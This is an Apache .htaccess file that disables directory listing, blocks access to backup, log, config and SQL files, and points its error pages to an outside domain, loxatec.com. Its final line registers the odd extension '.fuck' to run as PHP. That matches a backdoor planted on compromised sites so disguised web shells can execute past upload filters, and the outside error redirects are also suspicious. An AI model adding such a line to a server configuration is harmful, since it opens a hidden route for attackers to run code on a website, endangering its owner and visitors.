Options -Indexes
DirectoryIndex index.php
ErrorDocument 404 http://loxatec.com/gop/404.html
ErrorDocument 403 http://loxatec.com/gop/403.html
<FilesMatch "(\.(bak|config|dist|fla|inc|ini|log|psd|sh|sql|swp)|~)$">
    Order allow,deny
    Deny from all
    Satisfy All
</FilesMatch>
AddType application/x-httpd-php .fuck
